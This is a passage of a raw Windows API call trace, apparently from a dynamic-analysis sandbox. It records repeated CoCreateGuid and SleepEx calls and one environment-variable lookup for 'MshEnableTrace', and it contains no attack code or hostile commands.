[3]=0xb5, [4]=0x63, [5]=0xf9, [6]=0x29, [7]=0xf6))) returned 0x0 [0182.456] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xf1ea5576, Data2=0x11a3, Data3=0x453a, Data4=([0]=0xba, [1]=0x15, [2]=0xf, [3]=0x5c, [4]=0x8d, [5]=0xdc, [6]=0xa4, [7]=0xb3))) returned 0x0 [0182.456] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x9e205e98, Data2=0xd339, Data3=0x4444, Data4=([0]=0xb0, [1]=0xbe, [2]=0xec, [3]=0xa8, [4]=0xbf, [5]=0x2, [6]=0xf5, [7]=0x7e))) returned 0x0 [0182.456] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x7fbb4a66, Data2=0xea9a, Data3=0x4352, Data4=([0]=0xb5, [1]=0x4f, [2]=0xe2, [3]=0x65, [4]=0xa5, [5]=0x27, [6]=0xdb, [7]=0x16))) returned 0x0 [0182.457] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xf043b6f3, Data2=0x36bc, Data3=0x4c08, Data4=([0]=0xae, [1]=0x4, [2]=0xcd, [3]=0x17, [4]=0xa0, [5]=0xcb, [6]=0x32, [7]=0x8b))) returned 0x0 [0182.457] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xf5941f38, Data2=0x31f3, Data3=0x4dc8, Data4=([0]=0xa8, [1]=0x1c, [2]=0xb2, [3]=0xe9, [4]=0xc0, [5]=0xc8, [6]=0x8c, [7]=0x2b))) returned 0x0 [0182.458] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x75d3b45e, Data2=0xd10f, Data3=0x4dfb, Data4=([0]=0xbe, [1]=0xbd, [2]=0xf1, [3]=0x95, [4]=0xe2, [5]=0x99, [6]=0x5f, [7]=0x26))) returned 0x0 [0182.458] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x8edb0b00, Data2=0xb957, Data3=0x4233, Data4=([0]=0x8d, [1]=0x7c, [2]=0xc3, [3]=0x90, [4]=0xfe, [5]=0xca, [6]=0x4a, [7]=0x7e))) returned 0x0 [0182.459] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xd3bc05b0, Data2=0x3b56, Data3=0x4141, Data4=([0]=0x80, [1]=0x71, [2]=0xa7, [3]=0x36, [4]=0xa7, [5]=0xf, [6]=0x7e, [7]=0xfd))) returned 0x0 [0182.459] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xc346b478, Data2=0xd841, Data3=0x4fe8, Data4=([0]=0x85, [1]=0xc3, [2]=0x70, [3]=0x2, [4]=0x27, [5]=0x7b, [6]=0x43, [7]=0xd5))) returned 0x0 [0182.460] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x90ceb4ea, Data2=0x10e0, Data3=0x410b, Data4=([0]=0x9a, [1]=0x8c, [2]=0xc9, [3]=0x41, [4]=0xe0, [5]=0x3e, [6]=0x46, [7]=0xa3))) returned 0x0 [0182.461] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x111e378f, Data2=0xa5b3, Data3=0x48f7, Data4=([0]=0x86, [1]=0x5, [2]=0x29, [3]=0x53, [4]=0x91, [5]=0x49, [6]=0x65, [7]=0x4))) returned 0x0 [0182.461] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xd45e13ec, Data2=0xaee1, Data3=0x4466, Data4=([0]=0xab, [1]=0xdf, [2]=0x57, [3]=0x5d, [4]=0x6d, [5]=0x2a, [6]=0xfd, [7]=0x6c))) returned 0x0 [0182.462] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x4681072, Data2=0xe568, Data3=0x4a2e, Data4=([0]=0x88, [1]=0x7d, [2]=0x51, [3]=0xf0, [4]=0x54, [5]=0xa5, [6]=0x8c, [7]=0x98))) returned 0x0 [0182.462] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x3414f0d2, Data2=0xd079, Data3=0x4dd0, Data4=([0]=0x81, [1]=0x6a, [2]=0xc3, [3]=0x5e, [4]=0x3f, [5]=0x1, [6]=0x9f, [7]=0xac))) returned 0x0 [0182.463] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xff0e28f0, Data2=0x1d13, Data3=0x47db, Data4=([0]=0x9d, [1]=0x9e, [2]=0x51, [3]=0x70, [4]=0x32, [5]=0x22, [6]=0x98, [7]=0x23))) returned 0x0 [0182.463] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xb0054562, Data2=0x2d97, Data3=0x47ee, Data4=([0]=0x9b, [1]=0x53, [2]=0x21, [3]=0x2e, [4]=0xe8, [5]=0x67, [6]=0xf3, [7]=0x4c))) returned 0x0 [0182.885] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xfab25d53, Data2=0x7076, Data3=0x455f, Data4=([0]=0x9d, [1]=0x9b, [2]=0xc7, [3]=0x99, [4]=0xa0, [5]=0xc6, [6]=0x7b, [7]=0x47))) returned 0x0 [0182.982] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xb4634110, Data2=0xee13, Data3=0x4a1d, Data4=([0]=0xba, [1]=0x53, [2]=0x79, [3]=0x77, [4]=0x96, [5]=0xac, [6]=0xf8, [7]=0xcb))) returned 0x0 [0182.993] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xadfce326, Data2=0x884a, Data3=0x4dc1, Data4=([0]=0xb9, [1]=0xaf, [2]=0xc2, [3]=0xef, [4]=0xc, [5]=0x97, [6]=0x74, [7]=0x79))) returned 0x0 [0183.002] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x65e13a31, Data2=0xd4a, Data3=0x4c05, Data4=([0]=0x96, [1]=0xe, [2]=0x12, [3]=0x32, [4]=0x47, [5]=0x98, [6]=0x96, [7]=0x55))) returned 0x0 [0183.003] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x16db986f, Data2=0xa076, Data3=0x4556, Data4=([0]=0x94, [1]=0x1b, [2]=0x6d, [3]=0xdc, [4]=0x78, [5]=0xed, [6]=0xb5, [7]=0xa8))) returned 0x0 [0183.006] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xaeeaa912, Data2=0xd364, Data3=0x4a44, Data4=([0]=0x82, [1]=0xd3, [2]=0x39, [3]=0x95, [4]=0xcd, [5]=0x63, [6]=0xc7, [7]=0xfc))) returned 0x0 [0183.007] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x3bede904, Data2=0x7834, Data3=0x4b17, Data4=([0]=0xa8, [1]=0x5, [2]=0xd2, [3]=0xe, [4]=0x7d, [5]=0x1b, [6]=0xea, [7]=0x54))) returned 0x0 [0183.011] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x14fb7689, Data2=0xfe3, Data3=0x404e, Data4=([0]=0xaf, [1]=0x55, [2]=0x11, [3]=0x95, [4]=0x8, [5]=0x79, [6]=0xf4, [7]=0x4))) returned 0x0 [0183.013] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x187a614c, Data2=0x3e15, Data3=0x42da, Data4=([0]=0xb3, [1]=0xcf, [2]=0x34, [3]=0x4c, [4]=0xf, [5]=0x86, [6]=0xfc, [7]=0x59))) returned 0x0 [0183.013] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xa4c6314, Data2=0x6790, Data3=0x4bdc, Data4=([0]=0x97, [1]=0x7d, [2]=0xf1, [3]=0xc6, [4]=0xfc, [5]=0xa4, [6]=0x82, [7]=0xdf))) returned 0x0 [0183.016] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x53bce525, Data2=0x5e60, Data3=0x4822, Data4=([0]=0x8e, [1]=0x22, [2]=0xda, [3]=0x3f, [4]=0x5d, [5]=0x17, [6]=0xb0, [7]=0x85))) returned 0x0 [0183.018] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x9491c9ae, Data2=0x490b, Data3=0x42ad, Data4=([0]=0x96, [1]=0xb1, [2]=0x1a, [3]=0xa6, [4]=0xf3, [5]=0x52, [6]=0xe, [7]=0x6d))) returned 0x0 [0183.020] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x746eace1, Data2=0x74c2, Data3=0x4ab6, Data4=([0]=0xa9, [1]=0xd, [2]=0x26, [3]=0x5c, [4]=0xa4, [5]=0x81, [6]=0x52, [7]=0xa5))) returned 0x0 [0183.022] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x28e5c849, Data2=0x8f89, Data3=0x45f2, Data4=([0]=0xa4, [1]=0xc2, [2]=0x10, [3]=0x91, [4]=0xd, [5]=0x45, [6]=0xdb, [7]=0xb1))) returned 0x0 [0183.515] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x4d8995d4, Data2=0xc6e6, Data3=0x468a, Data4=([0]=0x94, [1]=0xcf, [2]=0x79, [3]=0xe7, [4]=0x79, [5]=0x45, [6]=0xf7, [7]=0xc5))) returned 0x0 [0183.519] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xef94d1a2, Data2=0x92da, Data3=0x493f, Data4=([0]=0x83, [1]=0x31, [2]=0xc0, [3]=0x8e, [4]=0xf7, [5]=0x8a, [6]=0xc4, [7]=0x14))) returned 0x0 [0183.523] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xfb2915e4, Data2=0x76d8, Data3=0x4a1d, Data4=([0]=0x82, [1]=0x59, [2]=0x1, [3]=0x4f, [4]=0x55, [5]=0xce, [6]=0xe, [7]=0x97))) returned 0x0 [0183.525] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xb22aa60b, Data2=0x80eb, Data3=0x4d7c, Data4=([0]=0xb1, [1]=0xcd, [2]=0x33, [3]=0xfd, [4]=0x8b, [5]=0x9c, [6]=0x45, [7]=0xd9))) returned 0x0 [0183.528] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x96640e6d, Data2=0x214, Data3=0x4742, Data4=([0]=0xb0, [1]=0x8a, [2]=0xee, [3]=0x39, [4]=0x2, [5]=0xd2, [6]=0xc3, [7]=0x68))) returned 0x0 [0183.532] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xaf28d0a7, Data2=0xb28f, Data3=0x429b, Data4=([0]=0x87, [1]=0xe6, [2]=0x83, [3]=0xf4, [4]=0x26, [5]=0xf8, [6]=0xa7, [7]=0xed))) returned 0x0 [0183.535] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x9f1115fc, Data2=0x79e7, Data3=0x4f59, Data4=([0]=0x89, [1]=0x4d, [2]=0x49, [3]=0x8c, [4]=0xfb, [5]=0xef, [6]=0xf0, [7]=0x2e))) returned 0x0 [0183.538] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x7280fb8c, Data2=0xa290, Data3=0x41e7, Data4=([0]=0xa6, [1]=0x4b, [2]=0xa9, [3]=0x98, [4]=0x11, [5]=0x56, [6]=0xc, [7]=0x97))) returned 0x0 [0183.540] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x97a2737d, Data2=0x8bbb, Data3=0x4ebf, Data4=([0]=0xaf, [1]=0xfe, [2]=0xba, [3]=0xd7, [4]=0x76, [5]=0x98, [6]=0x4f, [7]=0x25))) returned 0x0 [0183.541] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xb26116f6, Data2=0xc389, Data3=0x4e9d, Data4=([0]=0xa0, [1]=0xbc, [2]=0xdd, [3]=0xfc, [4]=0x8f, [5]=0x4b, [6]=0x1b, [7]=0x15))) returned 0x0 [0183.542] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x447942e3, Data2=0x1012, Data3=0x43ee, Data4=([0]=0xba, [1]=0x91, [2]=0xb0, [3]=0xd5, [4]=0x6f, [5]=0x81, [6]=0x72, [7]=0xad))) returned 0x0 [0183.543] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x7e26be8f, Data2=0x8019, Data3=0x4a75, Data4=([0]=0xbd, [1]=0x2, [2]=0x78, [3]=0x90, [4]=0xd1, [5]=0xca, [6]=0x3e, [7]=0x1a))) returned 0x0 [0183.544] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xa001e2f2, Data2=0xdd91, Data3=0x4b0e, Data4=([0]=0x9b, [1]=0xfe, [2]=0xb7, [3]=0x5d, [4]=0x35, [5]=0xba, [6]=0x96, [7]=0xb4))) returned 0x0 [0183.545] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xa942417, Data2=0xb14e, Data3=0x4360, Data4=([0]=0x93, [1]=0x49, [2]=0x2, [3]=0xd, [4]=0xd3, [5]=0x5e, [6]=0xff, [7]=0x38))) returned 0x0 [0183.546] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xe2de3313, Data2=0xaf97, Data3=0x454f, Data4=([0]=0x84, [1]=0xb5, [2]=0xc4, [3]=0xd, [4]=0x62, [5]=0xfe, [6]=0x30, [7]=0xcc))) returned 0x0 [0183.547] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x274449b2, Data2=0xeb3e, Data3=0x4df8, Data4=([0]=0xac, [1]=0xda, [2]=0x83, [3]=0xfa, [4]=0xbe, [5]=0x19, [6]=0x5a, [7]=0x91))) returned 0x0 [0183.548] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xeea17612, Data2=0x746a, Data3=0x4104, Data4=([0]=0xaa, [1]=0xa3, [2]=0xb7, [3]=0xf0, [4]=0x4f, [5]=0xa6, [6]=0x29, [7]=0x27))) returned 0x0 [0183.548] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xcc3f17c3, Data2=0xe491, Data3=0x4992, Data4=([0]=0xa7, [1]=0x8c, [2]=0x68, [3]=0x27, [4]=0xc1, [5]=0x18, [6]=0x17, [7]=0xad))) returned 0x0 [0183.549] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xc12ce9d6, Data2=0x693c, Data3=0x456d, Data4=([0]=0xb0, [1]=0xa9, [2]=0x63, [3]=0xaf, [4]=0x61, [5]=0x43, [6]=0x93, [7]=0x76))) returned 0x0 [0183.550] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xc4401491, Data2=0xf86, Data3=0x4030, Data4=([0]=0xbb, [1]=0x1d, [2]=0x7c, [3]=0x70, [4]=0x75, [5]=0xfc, [6]=0xfb, [7]=0x1b))) returned 0x0 [0183.551] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x1f28ec86, Data2=0x887, Data3=0x4047, Data4=([0]=0xb3, [1]=0x6b, [2]=0x2f, [3]=0xac, [4]=0x85, [5]=0xbb, [6]=0xd3, [7]=0xe4))) returned 0x0 [0183.551] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x9452d62a, Data2=0xe5cd, Data3=0x43bb, Data4=([0]=0xaa, [1]=0x32, [2]=0x5a, [3]=0x88, [4]=0x69, [5]=0x21, [6]=0x78, [7]=0xcd))) returned 0x0 [0183.551] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x25b7739, Data2=0x8e84, Data3=0x4f77, Data4=([0]=0xbd, [1]=0xf0, [2]=0x5f, [3]=0xc8, [4]=0x42, [5]=0x20, [6]=0xcc, [7]=0xda))) returned 0x0 [0183.553] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xb4e16e27, Data2=0x378c, Data3=0x4211, Data4=([0]=0xb3, [1]=0x23, [2]=0xb7, [3]=0x2f, [4]=0x6e, [5]=0xc2, [6]=0x2, [7]=0x1))) returned 0x0 [0183.554] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xac567eae, Data2=0x7b28, Data3=0x4c63, Data4=([0]=0xa7, [1]=0xcd, [2]=0x2f, [3]=0xaa, [4]=0x2d, [5]=0x42, [6]=0x18, [7]=0xdb))) returned 0x0 [0183.555] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x55f4cca0, Data2=0x7a30, Data3=0x4a79, Data4=([0]=0xb2, [1]=0xf7, [2]=0xbc, [3]=0x4, [4]=0x83, [5]=0xce, [6]=0x5d, [7]=0x97))) returned 0x0 [0183.724] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x2587af3d, Data2=0xd22b, Data3=0x425b, Data4=([0]=0xa6, [1]=0x59, [2]=0xb2, [3]=0x9e, [4]=0xaa, [5]=0x49, [6]=0xa, [7]=0x50))) returned 0x0 [0183.725] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x1eb6e51b, Data2=0xc6e9, Data3=0x4ebf, Data4=([0]=0xbe, [1]=0xd1, [2]=0x21, [3]=0x68, [4]=0xb9, [5]=0x4c, [6]=0x45, [7]=0x86))) returned 0x0 [0183.726] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x46d9ec10, Data2=0xf441, Data3=0x4bc2, Data4=([0]=0xbf, [1]=0x53, [2]=0x39, [3]=0x73, [4]=0x46, [5]=0xe8, [6]=0xb9, [7]=0xc1))) returned 0x0 [0183.727] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x50f960a7, Data2=0xe487, Data3=0x4403, Data4=([0]=0x90, [1]=0x5c, [2]=0x3, [3]=0x54, [4]=0x5d, [5]=0xad, [6]=0x4d, [7]=0x4))) returned 0x0 [0183.729] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0183.863] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0183.989] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0184.128] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0184.174] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0184.233] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0184.418] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0184.517] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0184.627] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0184.686] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0184.702] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0184.704] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0184.705] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0184.707] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0184.713] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0184.760] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0184.807] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0184.853] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0184.900] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0184.947] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0184.994] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0185.040] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0190.044] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0190.102] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0190.182] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0190.257] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0190.429] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0190.517] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0190.610] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0190.667] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0190.735] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0190.788] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0190.833] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0190.914] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0190.979] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0191.029] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0191.053] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0192.791] CoTaskMemAlloc (cb=0x24c) returned 0x7625fa0 [0192.791] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7625fa0, nSize=0x124 | out: lpBuffer="辨̣表ݥ") returned 0x0 [0192.792] CoTaskMemFree (pv=0x7625fa0) [0198.070] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0198.136] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0198.245] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0198.357] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0198.525] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0198.617] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0198.652] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0198.714] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0198.792] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0198.871] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0198.964] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0199.034] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0199.130] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0199.224] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0199.317] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0199.473] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0199.567] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0199.661] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0199.755] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0199.848] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0199.942] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0200.004] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0200.052] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0200.098] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0200.146] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0200.208] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0200.255] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0200.326] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0200.380] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0200.551] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0200.629] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0200.771] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0200.876] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0200.972] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0201.064] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0201.157] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0201.255] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0201.330] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0201.407] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0201.580] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0201.627] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0201.704] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0201.799] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0201.928] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0201.971] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0202.048] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0202.127] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0202.208] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0202.288] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0202.369] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0202.414] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0202.454] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0202.590] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0202.635] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0202.681] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0202.760] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0202.821] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0202.916] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0220.185] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0220.275] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0220.368] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0220.446] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0220.528] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0220.635] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0220.728] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0220.856] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0220.940] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0221.034] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0221.145] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0221.192] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0221.315] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0221.409] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0221.503] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0221.596] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0221.674] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0221.831] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0221.913] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0222.002] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0222.096] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0222.179] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0222.274] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0222.367] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0222.445] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0222.523] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0222.617] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0222.710] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0222.852] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0222.931] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0223.023] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0223.117] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0223.210] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0223.304] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0223.400] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0223.492] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0223.583] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0223.721] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0223.903] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0223.992] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0224.071] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0224.164] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0224.257] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0224.351] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0224.445] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0224.555] SleepEx (dwMilliseconds=0x0, 